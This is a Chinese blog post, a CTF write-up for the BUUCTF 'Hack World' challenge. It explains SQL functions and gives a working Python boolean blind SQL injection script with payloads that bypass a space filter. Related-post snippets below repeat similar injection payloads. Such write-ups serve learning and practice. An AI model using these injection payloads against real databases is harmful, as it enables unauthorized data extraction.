python代码 - BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World

已于 2022-04-20 18:22:51 修改
阅读量194 收藏
点赞数
分类专栏: 信安 文章标签: CTF
于 2022-04-09 18:25:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43750882/article/details/124063547
版权

标准的UUID格式为:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx (8-4-4-4-12)
涉及到了几个SQL语句:

SUBSTR(string,start,count) 
取子字符串,start开始,取count个 

ASCII(str)
返回字符串str的最左字符的数值。返回0,如果str为空字符串。返回NULL,如果str为NULL。 ASCII()返回数值是从0255。
例如:
SQL> SELECT ASCII('2'); 返回2的ascii码50
SQL> SELECT ASCII('dx'); 返回d的ascii码100

IF(a,b,c)
if判断,如果a满足条件,返回b,否则返回c
例如:
SQL> select if(ascii("a")=99,1,2);    返回2

python代码:(不是二分查找)

import requests
import time

'''
分析
id=true或1 返回 Hello, glzjin wants a girlfriend. 可以利用
id=2 返回 Do you want to be my girlfriend?
id=(表达式) 根据返回结果,逐个字母判断flag值
查询flag的SQL语句(由于过滤了空格,要用括号代替):(select(flag)from(flag))
使用SQL语句逐个取出flag字符:substr((select(flag)from(flag)),i,1) 从第i个取1一个字符
判断取出的的字符是什么字符:
根据什么判断?ascii
if(ascii(substr(select(flag)from(flag),i,1))=某ascii值,1,0)   正确返回1,错误返回0
每个字符都要进行判断,每次判断都要循环,所以是一个两层循环
'''

url = 'http://ea9211c6-ae0f-4e03-895e-007dd742f521.node4.buuoj.cn:81/index.php'
ch = ''
c = 0  # 记录一下循环次数
i = 1
asciivalue = 1
flag = 'flag{'

# mylist内容是包含ascii码值的列表,包括了对应的数字、字母、{}、-
mylist = list(range(45, 46)) + list(range(48, 58)) + list(range(65, 91)) + list(range(97, 124)) + list(range(125, 126))
for i in range(6, 50):

    for asciivalue in mylist:
        # 发出请求
        # POST中id的内容
        payload = 'if(ascii(substr((select(flag)from(flag)),{},1))={},1,0)'.format(i, asciivalue)

        data = {
            'id': payload
        }
        r = requests.post(url, data)
        time.sleep(0.2)

        # 检测回包内容

        c += 1
        if 'glzjin' in r.text:
            ch = chr(asciivalue)
            flag += ch
            print('\nGet it!!   {}'.format(flag))
            break
        else:
            print('.', end='')

    if ch == '}':
        print('Over!')
        break

print(flag)
print(c)
# flag{3e9bad6e-155d-4fe1-9d03-79c4de2f5321}
#      xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

几个基本的判断:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
如有错误,还请指出!

ccOCONuTT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1054
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
[CISCN2019 华北赛区 Day2 Web1]Hack World
m0_68074153的博客
08-13 407
sql盲注
buuctf-Hack World
m0_62094846的博客
02-21 484
很多都被过滤了,空格也是,回显信息只有1和2有,报错的信息也是一样的,用盲注试试。用if的盲注是可行的。
BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World
最新发布
m0_74167420的博客
06-23 360
payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。4、因此可以尝试通过布尔盲注的方式来得到flag。
BUUCTF——Hack World
weixin_45864041的博客
12-03 1281
题目告诉我们表名为flag,列名为flag 所以值查询为select flag from flag 按照提示传入id=0 传入id=1 什么都不传 现在看来应该是布尔型盲注,而且过滤了一些东西 尝试传入1^1 传入1^0 直接构造payload 1^(ascii(substr((select flag from flag),0,1))=102) 传入后可以发现,空格被过滤了 所以换一下 1^(ascii(substr((select(flag)from(flag)),0,1))=102) .
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 662
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
[CISCN2019 华北赛区 Day2 Web1]Hack World题解
qq_52843575的博客
04-07 3279
[CISCN2019 华北赛区 Day2 Web1]Hack World题解 判断类型 进入页面很明显就是考sql注入,与此同时页面直接告诉你表面和列名均是flag,直接开始注入,常用的注入函数均被过滤,直接fuzz爆破,查看被过滤的具体情况 结果确定此题为sql中的布尔盲注(post传参),也同时发现一个问题,请求过快时,会被过滤掉请求 确认绕过方法 因为or被过滤,百度一波后,发现可以使用^异或来绕过 异或:相同为假,相异为真,简单来说就是 1^1=0 0^0=0 1^0=1 空格也被过滤,因此
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
weixin_46196627的博客
06-11 261
[CISCN2019 华北赛区 Day2 Web1]Hack World1输入1,2返回不同信息,3时返回错误。 进行’单引号闭合,报错存有sql注入,且显示布尔false,很可能是布尔注入。 在进行sql常规注入时,发现过滤 or and || &&等。 此时可用异或注入。 1^1 false 1^0 true 0^0 false 0^1 true大佬wp python代码,可以学习一下。...
BUUCTF之[CISCN2019 华北赛区 Day2 Web1]Hack World ------- Boolean盲注
weixin_44632787的博客
10-05 379
第一眼看这题的时候还以为是堆叠查询,结果试了下发现并不是。然后试着试着发现这题其实是个bool盲注题。然后再写个Python脚本暴力破解就可以了(其实解题思路并不是自己想出来的,只是这题之前做过很多次了。所以现在再做的时候有印象) 这题没什么难的,主要知识点就是bool盲注。还有就是空格需要用括号()来绕过 先说一下网上找来的别的大佬的Payload # -*- coding:utf-8 -*- import requests import string def blind_injection(url).
BUUCTF-千层套路(python脚本)
qq_45699846的博客
03-17 4257
BUUCTF-千层套路(python脚本)
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 687
代码buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2025
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注 下
buuctfhack world wp
m0_55185160的博客
08-16 332
打开网页我们可以得到表名和列名都为flag 在输入框内输入1得到 输入2得到 输入3时 发现报错于是尝试注入 1 union select 1,2 发现受限制我们进行一个fuzz测试 长度为460的都是被过滤的 看了大佬的方法发现这里运用sql三目运算 if(表达式1,表达式2,表达式3)如果表达式1正确,执行表达式2,否则执行表达式3 if(ascil(substr((select(flag)from(flag)),%d,1))>%d,1,2)''%(x,mid) 用大佬的...
BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 752
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
BUUCTF:[SUCTF 2019]Pythonginx
qq_46230755的博客
12-18 403
题目提示了,是ngix,所以我们要知道nginx一些文件存放的地方 配置文件存放目录:/etc/nginx 主配置文件:/etc/nginx/conf/nginx.conf 管理脚本:/usr/lib64/systemd/system/nginx.service 模块:/usr/lisb64/nginx/modules 应用程序:/usr/sbin/nginx 程序默认存放位置:/usr/share/nginx/html 日志默认存放位置:/var/log/nginx 配置文件目录为:/usr/local
sql异同或注入总结
Aiwin的博客
10-12 1943
sql异同或注入总结与[NSSCTF 2022 Spring Recruit]babysql与[CISCN 2019华北Day2]Web1例题
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1748
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
2. **extract()函数**:这个函数用于从数组中提取元素作为独立的变量导入到当前作用域。如果传入的数组包含恶意构造的键名,可能会导致变量覆盖。可以通过限制`extract()`函数的`EXTR_OVERWRITE`标志或使用更安全的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值